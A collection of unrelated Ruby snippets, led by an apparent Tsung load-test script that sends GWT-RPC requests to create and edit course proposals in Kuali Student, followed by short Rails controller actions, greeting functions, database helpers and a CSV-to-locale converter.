@request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n \n # Edit Proposal\n \n if(!opts[:modify_fields][:course_information].empty?)\n \n if(opts[:modify_fields][:course_information][:description])\n \n # Save changes\n contents1 = \"5|0|159|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.core.assembly.data.Data/3119441076|org.kuali.student.core.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.core.assembly.data.Data$StringKey/1742996354|administeringOrgs|org.kuali.student.core.assembly.data.Data$DataValue/4040075329|org.kuali.student.core.assembly.data.Data$IntegerKey/2690592210|java.lang.Integer/3438268394|org.kuali.student.core.assembly.data.Data$StringValue/3696151110|58|_runtimeData|id-translation|%%_#{opts[:id_translation_id_dyn_var]}%%|passFail|org.kuali.student.core.assembly.data.Data$BooleanValue/268767974|java.lang.Boolean/476441737|audit|finalExamStatus|STD|campusLocations|ALL|All|code|%%_#{opts[:code_dyn_var]}%%|courseNumberSuffix|%%_#{opts[:course_num_suffix_dyn_var]}%%|courseSpecificLOs|loCategoryInfoList|desc|formatted|<p>Desc</p>|plain|Desc|effectiveDate|org.kuali.student.core.assembly.data.Data$DateValue/3833457837|java.sql.Timestamp/1769758459|expirationDate|id|%%_#{opts[:lo_category_id_dyn_var]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|versionInd|1|name|%%_#{opts[:lo_category_dyn_var]}%%|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|0|%%_#{opts[:lo_cat_text_dyn_var]}%%|%%_#{opts[:lo_cat_id_dyn_var]}%%|loRepositoryKey|createId|%%_#{opts[:create_id_dyn_var]}%%|createTime|updateId|updateTime|SINGLE USE LO|kuali.lo.type.singleUse|courseTitle|%%_#{opts[:course_title_dyn_var]}%%|creditOptions|fixedCreditValue|10|kuali.creditType.credit.degree.10|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|curriculumOversightOrgs|51|%%_#{opts[:oversight_org_dyn_var]}%%|descr|#{opts[:modify_fields][:course_information][:description]}|dirty|duration|atpDurationTypeKey|kuali.atp.duration.Year|timeQuantity|org.kuali.student.core.assembly.data.Data$IntegerValue/991919491|Year|expenditure|affiliatedOrgs|feeJustification|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_dyn_var]}%%|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_dur_week_id_dyn_var]}%%|2|draft|Lab|%%_#{opts[:lab_id_dyn_var]}%%|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:grade_id_dyn_var]}%%|instructors|personId|%%_#{opts[:person_id_dyn_var]}%%|joints|%%_#{opts[:joints_dyn_var]}%%|pilotCourse|revenues|specialTopicsCourse|subjectArea|%%_#{opts[:subject_area_dyn_var]}%%|termsOffered|kuali.atp.season.Any|Any|kuali.lu.type.CreditCourse|variations|Standard final Exam|transcriptTitle|proposal|%%_#{opts[:proposal_id_dyn_var]}%%|%%_#{opts[:proposal_num_dyn_var]}%%|%%_#{opts[:title_dyn_var]}%%|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|%%_#{opts[:rationale_dyn_var]}%%|kuali.proposal.type.course.create|workflowId|%%_#{opts[:workflow_id_dyn_var]}%%|\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|34|8|9|10|5|6|7|0|2|11|12|0|13|14|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|17|-12|-14|-5|-10|-1|-3|8|18|19|20|0|8|21|19|-22|8|22|13|23|8|24|10|5|6|7|0|2|11|-8|13|25|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|26|-35|-37|-29|-33|-1|-27|8|27|13|28|8|29|13|30|8|31|10|5|6|7|0|1|11|-8|10|5|6|7|0|3|8|32|10|5|6|7|0|1|11|-8|10|5|6|7|0|9|8|33|10|5|6|7|0|2|8|34|13|35|8|36|13|37|-61|-63|8|38|39|40|867724416|1198295875584|0|8|41|39|40|3896582272|1258425417728|0|8|42|13|43|8|44|13|45|8|46|10|5|6|7|0|1|8|47|13|48|-61|-81|8|49|13|50|8|51|13|52|8|53|13|54|-57|-59|-53|-55|8|55|10|5|6|7|0|0|-53|-93|8|56|10|5|6|7|0|7|8|57|13|58|8|33|10|5|6|7|0|2|8|34|13|59|8|36|13|59|-99|-103|8|42|13|60|8|61|13|45|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246181412|1284195221504|916000000|8|65|13|63|8|66|39|40|3246183944|1284195221504|448000000|8|47|13|48|-99|-115|8|49|13|67|8|53|13|68|-53|-97|-49|-51|-1|-47|8|69|13|70|8|71|10|5|6|7|0|1|11|-8|10|5|6|7|0|6|8|72|13|73|8|42|13|74|8|46|10|5|6|7|0|1|8|47|13|58|-143|-149|8|75|10|5|6|7|0|1|11|-8|13|73|-143|-155|8|53|13|76|8|15|10|5|6|7|0|1|8|53|10|5|6|7|0|1|8|16|13|77|-165|-167|-143|-163|-139|-141|-1|-137|8|78|10|5|6|7|0|0|-1|-173|8|79|10|5|6|7|0|2|11|-8|13|80|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|81|-185|-187|-179|-183|-1|-177|8|82|10|5|6|7|0|2|8|36|13|83|8|15|10|5|6|7|0|1|8|84|10|5|6|7|0|1|8|36|19|20|1|-201|-203|-195|-199|-1|-193|8|85|10|5|6|7|0|3|8|86|13|87|8|88|89|12|1|8|15|10|5|6|7|0|1|8|86|10|5|6|7|0|1|8|16|13|90|-221|-223|-212|-219|-1|-210|8|91|10|5|6|7|0|1|8|92|10|5|6|7|0|0|-231|-233|-1|-229|8|93|10|5|6|7|0|0|-1|-237|8|94|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|8|95|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|96|89|12|10|8|97|13|98|-251|-253|-247|-249|8|99|13|100|8|42|13|101|8|102|13|103|8|15|10|5|6|7|0|2|8|102|10|5|6|7|0|1|8|16|13|104|-270|-272|8|99|10|5|6|7|0|1|8|16|13|105|-270|-278|-247|-268|-243|-245|-1|-241|8|106|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|8|107|10|5|6|7|0|1|11|-8|10|5|6|7|0|9|8|108|13|109|8|110|10|5|6|7|0|3|8|111|13|73|8|112|13|113|8|15|10|5|6|7|0|1|8|112|10|5|6|7|0|1|8|16|13|114|-312|-314|-304|-310|-298|-302|8|79|10|5|6|7|0|0|-298|-320|8|115|89|12|100|8|85|10|5|6|7|0|3|8|86|13|116|8|88|89|12|12|8|15|10|5|6|7|0|1|8|86|10|5|6|7|0|1|8|16|13|117|-338|-340|-329|-336|-298|-327|8|42|13|118|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246177449|1284195221504|953000000|8|65|13|63|8|66|39|40|3246183904|1284195221504|408000000|8|47|13|119|-298|-348|8|51|13|120|8|15|10|5|6|7|0|1|8|108|10|5|6|7|0|1|8|16|13|121|-368|-370|-298|-366|-294|-296|-290|-292|8|42|13|122|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246177416|1284195221504|920000000|8|65|13|63|8|66|39|40|3246183890|1284195221504|394000000|8|47|13|119|-290|-378|8|51|13|120|8|53|13|123|-286|-288|-1|-284|8|124|10|5|6|7|0|2|11|-8|13|125|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|126|-406|-408|-400|-404|-1|-398|8|42|13|127|8|128|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|129|13|63|8|15|10|5|6|7|0|1|8|129|10|5|6|7|0|1|8|16|13|130|-428|-430|-422|-426|-418|-420|-1|8|128|8|131|10|5|6|7|0|0|-1|-437|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246166611|1284195221504|115000000|8|65|13|63|8|66|39|40|3246183834|1284195221504|338000000|8|47|13|132|-1|-441|8|133|19|-22|8|134|10|5|6|7|0|0|-1|-459|8|135|19|-22|8|51|13|120|8|136|13|137|8|138|10|5|6|7|0|2|11|-8|13|139|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|140|-477|-479|-471|-475|-1|-469|8|53|13|141|8|142|10|5|6|7|0|0|-1|-487|8|15|10|5|6|7|0|3|8|136|10|5|6|7|0|1|8|16|13|137|-493|-495|8|22|10|5|6|7|0|1|8|16|13|143|-493|-501|-203|10|5|6|7|0|3|8|144|19|-209|8|128|19|-209|8|136|19|-209|-493|-203|-1|-491|8|145|10|5|6|7|0|10|8|42|13|146|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246166532|1284195221504|36000000|8|65|13|63|8|66|39|40|3246183375|1284195221504|879000000|8|47|13|147|-518|-522|8|49|13|148|8|149|10|5|6|7|0|1|11|-8|13|127|-518|-540|8|150|13|151|8|152|10|5|6|7|0|0|-518|-548|8|153|10|5|6|7|0|0|-518|-552|8|154|13|155|8|53|13|156|8|157|13|158|-1|-516|-510|13|159|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n end\n \n end\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n \n end",
"def greet_with_language(name, language = 'pt')\n case language.downcase\n when 'en'\n puts \"Hello, #{name.capitalize}\"\n when 'es'\n puts \"Hola, #{name.capitalize}\"\n else\n puts \"Olá, #{name.capitalize}\"\n end\nend",
"def create_extension\n execute(\"SET client_min_messages = warning\")\n begin\n execute(\"CREATE EXTENSION IF NOT EXISTS hypopg\")\n rescue PG::UndefinedFile\n abort \"Install HypoPG first: https://github.com/ankane/dexter#installation\"\n rescue PG::InsufficientPrivilege\n abort \"Use a superuser to run: CREATE EXTENSION hypopg\"\n end\n end",
"def ensure_languages(owner, repo)\n currepo = ensure_repo(owner, repo)\n langs = retrieve_languages(owner, repo)\n\n if langs.nil? or langs.empty?\n warn \"Could not find languages for repo #{owner}/#{repo}\"\n return\n end\n\n ts = Time.now\n langs.keys.each do |lang|\n db[:project_languages].insert(\n :project_id => currepo[:id],\n :language => lang.downcase,\n :bytes => langs[lang],\n :created_at => ts\n )\n info \"Added project_language #{owner}/#{repo} -> #{lang} (#{langs[lang]} bytes)\"\n end\n db[:project_languages].where(:project_id => currepo[:id]).where(:created_at => ts).all\n end",
"def greetings_programmer(name, language = \"computer\")\n puts \"Hello, #{name}. We heard you are a great #{language} programmer.\"\nend",
"def create\n @actor_language = ActorLanguage.new(actor_language_params)\n\n respond_to do |format|\n if @actor_language.save\n format.html { redirect_to @actor_language, notice: 'Actor language was successfully created.' }\n format.json { render :show, status: :created, location: @actor_language }\n else\n format.html { render :new }\n format.json { render json: @actor_language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @language = Language.new(language_params)\n\n respond_to do |format|\n if @language.save\n flash[:notice] = 'Language was successfully created.'\n format.html { redirect_to(@language) }\n format.xml { render xml: @language, status: :created, location: @language }\n else\n format.html { render action: 'new' }\n format.xml { render xml: @language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_procedure(opts={})\n name = opts[:name]\n raise Error, \"JSON-RPC procedure must have a name\" if name.blank?\n proc = opts[:proc]\n raise Error, \"JSON-RPC procedure must specify a :proc to be executed locally\" if proc.blank?\n begin\n proc = proc.to_proc\n rescue Exception => e\n raise Error, \":proc argument could not be converted to a proc (#{e.message})\"\n end\n opts[:proc] = proc\n # Canonicalise opts[:params]. We use strings internally, since parameter names will be \n # passed as such.\n opts[:params] = (opts[:params] || []).collect do |p|\n if p.is_a?(String)\n {:name => p.to_s, :type => 'any'}\n else\n {:name => p[:name].to_s, :type => (p[:type] || 'any').to_s}\n end\n end\n # Canonicalise opts[:return]\n opts[:return] = if opts[:return]\n {:type => (opts[:return][:type] || 'any').to_s}\n else\n {:type => 'any'}\n end\n # Register the new procedure with the service\n self.procs[name] = opts\n # Empty the system.describe cache\n @sd_cache = nil\n # Finally return the procedure's call name\n name\n end",
"def create\n @o_single = Language.new(language_params)\n respond_to do |format|\n if @o_single.save\n create_locale_file\n format.html { redirect_to admin_languages_url, notice: t(\"general.successfully_created\") }\n format.json { head :no_content }\n else\n format.html { render action: 'new' }\n format.json { render json: @o_single.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_language_content(language_id, data)\n create_content(Voog::API::Contents::ParentKind::Language, language_id, data)\n end",
"def politician_name_checker_create(string)\n if string.length < 1\n puts \"Please enter a valid name.\"\n World.create_politician\n end\n end",
"def create_function( db, name, args, text, cookie, func, step, final )\n if func || ( step && final )\n cb = CallbackData.new\n cb.proc = cb.proc2 = nil\n cb.data = cookie\n end\n\n if func\n cb.proc = func\n step = final = nil\n elsif step && final\n cb.proc = step\n cb.proc2 = final\n\n func = nil\n end\n\n result = CSSQLite.sqlite3_create_function( db, name, args, text, cb, func, step, final )\n\n # see comments in busy_handler\n if cb\n @callback_data[ name ] = cb\n else\n @callback_data.delete( name )\n end\n\n return result\n end",
"def create\n # コードを記述する\n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def convert(name = @csv_filename)\n rowIndex = 0\n excludedCols = []\n defaultCol = 0\n\n CSV.foreach(name, :quote_char => '\"', :col_sep => @csv_separator, :row_sep => :auto) do |row|\n\n if rowIndex == 0\n #check there's at least two columns\n return unless row.count > 1\n else\n #skip empty lines (or sections)\n next if row == nil or row[@keys_column].nil?\n end\n\n # go through columns\n row.size.times do |i|\n next if excludedCols.include? i\n\n #header\n if rowIndex == 0\n # defaultCol can be the keyValue\n defaultCol = i if self.default_lang == row[i]\n # ignore all headers not listed in langs to create files\n (excludedCols << i and next) unless @langs.has_key?(row[i])\n\n language = Language.new(row[i])\n if @langs[row[i]].is_a?(Array)\n @langs[row[i]].each do |id|\n language.add_language_id(id.to_s)\n end\n else\n language.add_language_id(@langs[row[i]].to_s)\n end\n @languages[i] = language\n elsif !@state_column || (row[@state_column].nil? || row[@state_column] == '' || !@excluded_states.include?(row[@state_column]))\n key = row[@keys_column]\n comment = @comments_column ? row[@comments_column] : nil\n key.strip! if @stripping\n default_value = self.default_lang ? row[defaultCol] : nil\n value = self.process_value(row[i], default_value)\n @comments[key] = comment\n @languages[i].add_content_pair(key, value)\n end\n end\n\n rowIndex += 1\n end\n\n write_content\n end",
"def create\n\t\tputs \"\\nWhat would you like to create? (P)olitician or (V)oter\"\n\t\tpolitics = gets.chomp.upcase\n\t\tcase politics\n\t\twhen \"V\"\n\t\t\tvoter_creation\n\t\twhen \"P\"\n\t\t\tpolitician_creation\n\t\telse\n\t\t\tputs \"\\nSomething went wrong. Please select again\"\n\t\t\tcreate\n\t\tend\n\t\tmain_menu\n\tend",
"def langue_params\n params.require(:langue).permit(:name)\n end",
"def language_server; end",
"def create_publication(name, all_tables = false, tables = [], options = {})\n base_command = \"CREATE PUBLICATION #{connection.quote_ident(name)}\"\n if all_tables\n base_command << \" FOR ALL TABLES\"\n elsif !tables.empty?\n base_command << \" FOR TABLE #{safe_list(tables)}\"\n end\n typed_exec(@command_builder.command_with_options(base_command, \"WITH\", options))\n end",
"def international_create(label_options)\n create_label File.join(LABEL_URL, 'international', label_options)\n end",
"def InstallPlugin(name: nil, &proc)\n Dsl.register_rb_hook('install_plugin', [], proc, name: name)\n end",
"def add_code(cheatsheet_db, language, type, code, comment)\n cheatsheet_db.execute(\"INSERT INTO #{language} (type, code, comment) VALUES (?, ?, ?)\", [type, code, comment])\nend",
"def create_proposal(title, oversight_department, admin_org, opts={})\n \n lo_cat = \"Scientific method\"\n lo_cat_text = \"LO Cat Text\"\n \n defaults = {\n :propose_person => '%%_username%%', #user the dynvar from users.csv\n :mode => 'blank',\n :nav_homepage => true,\n :submit => true,\n :append_unique_id => false, #tell tsung to append unique id on title\n :instructor => 'fred', #BUG - HARDCODED - can't use dynvar though because of ajax search\n :collaborator => @request.config.directory[\"users\"][\"collaborator\"][\"username\"],\n :first_expected_offering => @request.config.directory[\"atp\"][\"name\"],\n :subject_area => \"BSCI\",\n :oversight_dept_number => \"65\", #BUG - right now hardcoded to BSCI, search that returned this was removed\n :course_suffix => \"123\",\n :course_short_title => \"Perf Course\",\n :course_title => title,\n :course_description => \"My fake description.\",\n :course_rationale => \"My fake rationale.\",\n :lo_create => FALSE,\n :lo_category => lo_cat,\n :lo_cat_text => lo_cat_text,\n :lo_name => @request.config.directory[\"lo\"][\"name\"],\n :admin_dep_var_name => \"admin_dep_org_id\",\n :admin_dep_var_regexp => 'org.resultColumn.orgId\\\"\\,\\\"\\([^\\\"]+\\)',\n :proposal_dyn_var_name => \"proposal_id\",\n :proposal_dyn_var_regexp => '\\\"proposal\\\"\\,\\\"workflowNode\\\"\\,\\\"PreRoute\\\"\\,\\\"\\([^\\\"]+\\)',\n :proposal_doc_id_var_name => \"proposal_doc_id\",\n :proposal_doc_id_var_regexp => 'workflowId\\\"\\,\\\"\\([^\\\"]+\\)\\\"',\n :clu_ref_dyn_var_name => \"clu_ref_id\",\n :clu_ref_dyn_var_regexp => '\\\"id\\\"\\,\\\"\\([^\\\"]+\\)',\n :result_com_var_name => \"result_component_id\",\n :result_com_var_regexp => '\\\"ResultComponent 1\\\"\\,\\\"\\([^\\\"]+\\)',\n :enroll_est_var_name => \"default_enrollment_estimate_id\",\n :enroll_est_var_regexp => 'defaultEnrollmentEstimate\\\"\\,\\\"kuali.atp.duration.Week\\\"\\,\\\"Week\\\"\\,\\\"\\([^\\\"]+\\)',\n :lab_var_name => \"lab_id\",\n :lab_var_regexp => 'draft\\\"\\,\\\"unitsContentOwner\\\"\\,\\\"Lab\\\"\\,\\\"\\([^\\\"]+\\)',\n :lab_fee_id_name => 'cp_lab_fee_id',\n :lab_fee_id_regexp => 'kuali.enum.type.feeTypes.labFee\\\"\\,\\\"\\([^\\\"]+\\)',\n :revenues_id_name => 'cp_revenues_id',\n :revenues_id_regexp => 'revenues\\\"\\,\\\"\\([^\\\"]+\\)',\n :revenue_id_name => 'cp_revenue_id',\n :revenue_id_regexp => 'REVENUE\\\"\\,\\\"\\([^\\\"]+\\)',\n :joints_var_name => \"joints_num\",\n :joints_var_regexp => 'joints\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :fee_info_id_dyn_var_name => 'fee_info_id',\n :fee_info_id_dyn_var_regexp => '\\\"fees\\\"\\,\\\"\\([^\\\"]+\\)',\n :fee_info_dyn_var_name => 'fee_info',\n :fee_info_dyn_var_regexp => 'org.kuali.student.lum.lu.dto.CluFeeInfo\\\"\\,\\\"\\([^\\\"]+\\)',\n :clu_info_dyn_var_name => 'clu_info',\n :clu_info_dyn_var_regexp => 'org.kuali.student.lum.lu.dto.CluInfo\\\"\\,\\\"\\([^\\\"]+\\)',\n :lu_dto_clu_format_dyn_var_name => \"lu_dto_clu_format\",\n :lu_dto_clu_format_dyn_var_regexp => 'org.kuali.student.lum.lu.dto.CluInfo\\\"\\,\\\"Credit Course\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"formats\\\"\\,\\\"\\([^\\\"]+\\)',\n :lu_dto_clu_activities_dyn_var_name => \"lu_dto_clu_activites\",\n :lu_dto_clu_activities_dyn_var_regexp => 'org.kuali.student.lum.lu.dto.CluInfo\\\"\\,\\\"Credit Course\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"formats\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"0\\\"\\,\\\"activities\\\"\\,\\\"\\([^\\\"]+\\)',\n :outcome_id_var_name => \"outcome_id\",\n :outcome_id_var_regexp => 'outcomeId\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_var_name => \"lo_category\",\n #:lo_category_var_regexp => lo_cat_text + '\\\"\\,\\\"plain\\\"\\,\\\"id\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_var_regexp => lo_cat_text + '\\\"\\,\\\"plain\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_id_var_name => \"lo_category_id\",\n :lo_category_id_var_regexp => 'lo.resultColumn.categoryId\"\\,\\\"\\([^\\\"]+\\)',\n :lo_child_id_dyn_var_name => \"lo_child_id\",\n :lo_child_id_dyn_var_regexp => 'childLo\\\"\\,\\\"\\([^\\\"]+\\)',\n :single_use_lo_dyn_var_name => \"single_use_lo\",\n :single_use_lo_dyn_var_regexp => 'includedSingleUseLo\\\"\\,\\\"\\([^\\\"]+\\)',\n :atp_duration_week_var_name => 'atp_duration_week',\n :atp_duration_week_var_regexp => 'kuali.atp.duration.Week\\\"\\,\\\"Week\\\"\\,\\\"\\([^\\\"]+\\)',\n :version_ind_id_name => 'cp_version_ind_id',\n :version_ind_id_regexp => 'versionIndId\\\"\\,\\\"\\([^\\\"]+\\)',\n :affliated_orgs_id_name => 'cp_affiliated_orgs_id',\n :affliated_orgs_id_regexp => 'affiliatedOrgs\\\"\\,\\\"\\([^\\\"]+\\)',\n :action_request_id_name => 'cp_action_request_id',\n :action_request_id_regexp => 'actionRequestId\\\"\\,\\\"\\([^\\\"]+\\)'\n }\n \n # Version for the doc at each step. We'll increment on each usage\n # So first usage should eval to 0\n version_indicator = -1\n \n opts = defaults.merge(opts)\n \n title << '_%%ts_user_server:get_unique_id%%' if(opts[:append_unique_id])\n \n if(opts[:mode] != \"blank\")\n # select template or copy course...\n end\n \n # Navigate to Curriculum Mgmt\n self.homepage() unless(!opts[:nav_homepage])\n \n puts \"creating proposal as: #{opts[:propose_person]}\"\n \n # Create a course\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SecurityRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|13BFCB3640903B473D12816447D1469D|org.kuali.student.common.ui.client.service.SecurityRpcService|checkAdminPermission|java.lang.String/2004016611|#{opts[:propose_person]}|useCurriculumReview|1|2|3|4|2|5|5|6|7|\"\n }, {'subst' => 'true'}\n )\n \n \n # Click Start blank proposal\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|15|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getMetadata|java.lang.String/2004016611|java.util.Map||java.util.HashMap/962170901|documentTypeName|kuali.proposal.type.course.create|DtoState|Draft|DtoNextState|DtoWorkflowNode|PreRoute|1|2|3|4|2|5|6|7|8|4|5|9|5|10|5|11|5|12|5|13|5|7|5|14|5|15|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/statementRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|2543249A07E7952228E0E500F14F1B17|org.kuali.student.lum.program.client.rpc.StatementRpcService|getStatementTypesForStatementTypeForCourse|java.lang.String/2004016611|kuali.statement.type.course|1|2|3|4|1|5|6|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|atp.resultColumn.atpSeasonTypeName|1|2|3|4|1|5|5|0|0|6|0|7|8|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|atp.search.atpDurationTypes|atp.resultColumn.atpDurTypeName|1|2|3|4|1|5|5|0|0|6|0|7|8|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.passFail|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.completedNotation|kuali.resultComponent.grade.percentage|lrc.search.resultComponent|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|5|11|12|11|13|11|14|11|15|11|16|0|17|18|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n 